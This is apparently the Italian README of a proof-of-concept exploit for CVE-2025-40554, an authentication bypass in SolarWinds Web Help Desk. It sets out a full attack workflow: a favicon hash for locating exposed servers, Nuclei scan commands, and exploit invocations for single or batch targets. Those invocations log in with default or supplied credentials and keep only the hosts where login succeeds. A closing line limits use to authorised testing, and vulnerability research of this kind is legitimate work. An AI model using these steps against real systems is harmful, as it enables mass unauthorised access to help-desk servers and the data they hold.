
Proof-of-concept per CVE-2025-40554, un bypass dell'autenticazione in SolarWinds Web Help Desk. Include un template per Nuclei e un exploit Python per test su singoli o batch di bersagli con login opzionale tramite credenziali.
http.favicon.hash:"1895809524"
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt
Singolo target (bypass + login, default client/client):
python3 exploit_auth_bypass.py -t https://TARGET:8443
Singolo target con credenziali personalizzate:
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass
Singolo target, solo bypass (nessun login):
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
Lista di target (salva solo vulnerabili+login):
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
Lista di target con credenziali personalizzate:
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret
Modalità silenziosa (stampa solo URL dove il login ha avuto successo):
python3 exploit_auth_bypass.py -l result_all.txt -q
Questo PoC è solo per ricerca e test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori non sono responsabili per l'uso improprio.